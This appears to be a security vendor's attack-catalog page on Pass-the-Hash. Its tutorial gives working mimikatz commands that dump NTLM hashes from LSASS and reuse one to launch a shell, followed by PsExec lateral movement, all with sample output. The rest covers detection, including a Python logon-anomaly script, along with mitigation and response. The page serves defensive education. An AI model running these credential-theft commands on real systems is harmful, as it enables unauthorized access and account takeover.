Pass the Hash Attack

Once an adversary has gained a foothold in the network, their tactics shift to compromising additional systems and obtaining the privileges they need to complete their mission. Pass-the-Hash is a credential theft and lateral movement technique in which an attacker abuses the NTLM authentication protocol to authenticate as a user without ever obtaining the account’s plaintext password. Since the attacker uses the password hash, which normally changes only when the password itself is changed, the adversary has significant time to abuse the compromised account.

Threat Summary

Target: LM and NTLM-enabled Windows endpoints

Tools: mimikatz, Cobalt Strike, Empire, Invoke-TheHash, Metasploit

ATT&CK® Tactic: Defense Evasion, Lateral Movement

ATT&CK Technique: T1550.002

Difficulty

Detection: Hard

Mitigation: Hard

Response: Medium

Attack Tutorial: How a Pass the Hash Attack Works

STEP 1: Steal password hashes

An adversary who has gained a foothold in a network can use any of multiple methods to obtain password hashes, including DCSync attacks and extracting hashes from NTDS.dit. Another method, shown below, is to extract password hashes from the LSASS.exe process memory, which stores hashes for users with active sessions to the computer. Note that this technique requires the adversary to have compromised administrative privileges to the computer (e.g., by enticing a user who is an administrator on the workstation to open a phishing email).

    PS> .\mimikatz.exe "privilege::debug" "log passthehash.log" "sekurlsa::logonpasswords"

    Authentication Id : 0 ; 302247 (00000000:00049ca7)
    Session           : RemoteInteractive from 2
    User Name         : joed
    Domain            : DOMAIN
    Logon Server      : DC1
    Logon Time        : 09/07/2020 10:31:19
    SID               : S-1-5-21-3501040295-3816137123-30697657-1109
            msv :
             [00000003] Primary
             * Username : joed
             * Domain   : DOMAIN
             * NTLM     : eed224b4784bb040aab50b8856fe9f02
             * SHA1     : 42f95dd2a124ceea737c42c06ce7b7cdfbf0ad4b
             * DPAPI    : e75e04767f812723a24f7e6d91840c1d
            tspkg :
            wdigest :
             * Username : joed
             * Domain   : DOMAIN
             * Password : (null)
            kerberos :
             * Username : joed
             * Domain   : domain.com
             * Password : (null)
            ssp :
            credman :

STEP 2: Authenticate using a stolen password hash

Next, the adversary uses one of the stolen password hashes to authenticate as a user using the Pass the Hash technique. The example below demonstrates using the stolen password hash to launch cmd.exe; it is also possible to pass the hash directly over the wire to any accessible resource permitting NTLM authentication.

To pass the hash using mimikatz sekurlsa::pth, the following parameters are specified:

  • /user: — the compromised user’s username
  • /domain: — the FQDN of the domain (if using a domain account) or “.” (if using a local account)
  • /ntlm:, /aes128: or /aes256: — the stolen NTLM, AES-128 or AES-256 password hash

    PS> .\mimikatz.exe "sekurlsa::pth /user:JoeD /domain:domain.com /ntlm:eed224b4784bb040aab50b8856fe9f02"

    user    : JoeD
    domain  : domain.com
    program : cmd.exe
    impers. : no
    NTLM    : eed224b4784bb040aab50b8856fe9f02
      |  PID  11560
      |  TID  10044
      |  LSA Process is now R/W
      |  LUID 0 ; 58143370 (00000000:0377328a)
      \_ msv1_0   - data copy @ 000001AE3DDE8A30 : OK !
      \_ kerberos - data copy @ 000001AE3DECE9E8
         \_ aes256_hmac       -> null
         \_ aes128_hmac       -> null
         \_ rc4_hmac_nt       OK
         \_ rc4_hmac_old      OK
         \_ rc4_md4           OK
         \_ rc4_hmac_nt_exp   OK
         \_ rc4_hmac_old_exp  OK
         \_ *Password replace @ 000001AE3DFEC428 (32) -> null

    # New CMD window opens


STEP 3: Access other resources

Finally, the adversary can use their newly acquired privileges to further their objectives. The example below shows how they can use the PsExec tool to execute commands on remote systems in order to expand their footprint and repeat the cycle of credential theft and lateral movement on an ever-growing number of systems.

    PS> .\PSExec.exe \\server1 cmd.exe

    PsExec v2.2 - Execute processes remotely
    Copyright (C) 2001-2016 Mark Russinovich
    Sysinternals - www.sysinternals.com

    Microsoft Windows [Version 10.0.17763.1282]
    (c) 2018 Microsoft Corporation. All rights reserved.

    C:\Windows\system32>hostname
    server1

Detect, Mitigate and Respond

Detect

Difficulty: Hard

Because NTLM authentication is processed by each workstation and server, pass-the-hash can be challenging for organizations to detect, as each endpoint needs to be monitored for suspicious activity.

  • Monitor NTLM authentications (particularly for remote connections) for changes in patterns of user behavior, for example a user accessing a larger number of endpoints than normal, or a user accessing endpoints for the first time.
  • In order to extract hashes from an endpoint's LSASS.exe process, the malware would need to obtain a handle with the PROCESS_VM_OPERATION and PROCESS_VM_WRITE access rights. Endpoint Detection and Response solutions can monitor for processes creating suspicious handles.
  • Extracting hashes from Active Directory requires administrative privileges and use of other techniques like DCSync and extracting hashes from NTDS.dit. Detection of these techniques is discussed on their Attack Catalog pages.
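As an added example (not code from the Netwrix page), the following Python script implements the first detection idea above: it filters constructed 4624 logon events down to NTLM network logons (logon type 3) and flags users who reach a host for the first time or fan out to far more hosts than their baseline window. The event field names, host names and the fan-out factor are assumptions chosen for illustration.

```python
from collections import defaultdict

# Constructed sample events (not real logs). Each mirrors the fields of a
# Windows Security 4624 logon event collected from the *target* endpoint.
BASELINE_EVENTS = [
    {"user": "joed",  "host": "FS01",    "logon_type": 3, "auth_pkg": "NTLM"},
    {"user": "joed",  "host": "PRINT01", "logon_type": 3, "auth_pkg": "NTLM"},
    {"user": "alice", "host": "FS01",    "logon_type": 3, "auth_pkg": "NTLM"},
]
CURRENT_EVENTS = [
    {"user": "joed",  "host": "FS01",     "logon_type": 3, "auth_pkg": "NTLM"},
    {"user": "joed",  "host": "PRINT01",  "logon_type": 3, "auth_pkg": "NTLM"},
    {"user": "joed",  "host": "WS07",     "logon_type": 3, "auth_pkg": "NTLM"},
    {"user": "joed",  "host": "WS12",     "logon_type": 3, "auth_pkg": "NTLM"},
    {"user": "joed",  "host": "SRV-DB01", "logon_type": 3, "auth_pkg": "NTLM"},
    {"user": "joed",  "host": "WS01",     "logon_type": 2, "auth_pkg": "NTLM"},      # console logon, ignored
    {"user": "alice", "host": "FS01",     "logon_type": 3, "auth_pkg": "NTLM"},
    {"user": "alice", "host": "WS99",     "logon_type": 3, "auth_pkg": "Kerberos"},  # not NTLM, ignored
]

def hosts_per_user(events):
    """Map user -> set of hosts reached via NTLM network logons (4624, type 3, NTLM)."""
    seen = defaultdict(set)
    for e in events:
        if e["logon_type"] == 3 and e["auth_pkg"] == "NTLM":
            seen[e["user"]].add(e["host"])
    return seen

def find_anomalies(baseline_events, current_events, fanout_factor=2.0):
    """Return (user, kind, detail) findings: first-time hosts and fan-out beyond baseline.

    fanout_factor is an assumed tuning knob: a user reaching more than
    fanout_factor * (baseline host count) distinct hosts is flagged.
    """
    baseline = hosts_per_user(baseline_events)
    current = hosts_per_user(current_events)
    findings = []
    for user, hosts in sorted(current.items()):
        known = baseline.get(user, set())
        for host in sorted(hosts - known):
            findings.append((user, "first_access", host))
        if known and len(hosts) > fanout_factor * len(known):
            findings.append((user, "fanout", f"{len(hosts)} hosts vs baseline {len(known)}"))
    return findings

if __name__ == "__main__":
    for finding in find_anomalies(BASELINE_EVENTS, CURRENT_EVENTS):
        print(finding)
```

In a real deployment the baseline window would be built from several weeks of forwarded 4624 events rather than an inline list, and the findings fed to the SIEM alongside the handle-monitoring signals from the second bullet.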

Mitigate

Difficulty: Hard

Because pass-the-hash abuses features of the NTLM protocol it cannot be entirely eliminated. However, there are solutions that can make it harder for adversaries to compromise hashes or restrict their ability to use those hashes to move laterally.

  • Enable Microsoft's Windows Defender Credential Guard. Introduced in Windows 10 and Windows Server 2016, Credential Guard builds on top of virtualization to protect credential storage and only permit trusted processes to access them.
  • Remove users' administrator privileges from their workstations, limiting an adversary's ability to execute malware and removing the privileges needed to extract hashes from LSASS.exe.
  • Do not allow users to possess administrative privileges to a large number of endpoints. This greatly reduces a credential's value to an adversary seeking to use it for lateral movement.
  • Do not allow users to possess administrative privileges across security boundaries. This greatly reduces the risk that a compromised credential can be used by an adversary to escalate privileges.
  • Randomize and store local administrator passwords using a solution like Microsoft's Local Administrator Password Solution (LAPS). This reduces an adversary's ability to move laterally with local accounts that share the same password.
  • Do not permit local accounts to authenticate over the network. This reduces an adversary's ability to move laterally with local accounts that share the same password. Two well-known SIDs were added in Windows 8.1 and Windows Server 2012 R2 and can be used in group policies for this purpose: S-1-5-113 applies to any local account, while S-1-5-114 applies to any local account that is also a member of the local Administrators group.
  • Add privileged domain accounts to the Protected Users group to reduce credential theft risks.
  • Configure a host-based firewall (like Windows Defender Firewall) to control and limit which hosts can communicate with which others. For example, in most environments, workstations have little need to communicate directly with other workstations. Using a host-based firewall to block this traffic can limit lateral movement.

Respond

Difficulty: Medium

If you detect a possible use of Pass the Hash, take the following actions immediately:

  • Activate the incident response process and alert the response team.
  • Reset the password for the compromised user, which makes the stolen password hash invalid.
  • Quarantine the impacted machines for forensic investigation and eradication and recovery activities. Analyze logs to determine whether this computer is patient zero or the attacker pivoted to this machine from elsewhere, as well as whether the attacker pivoted from this machine to another one.
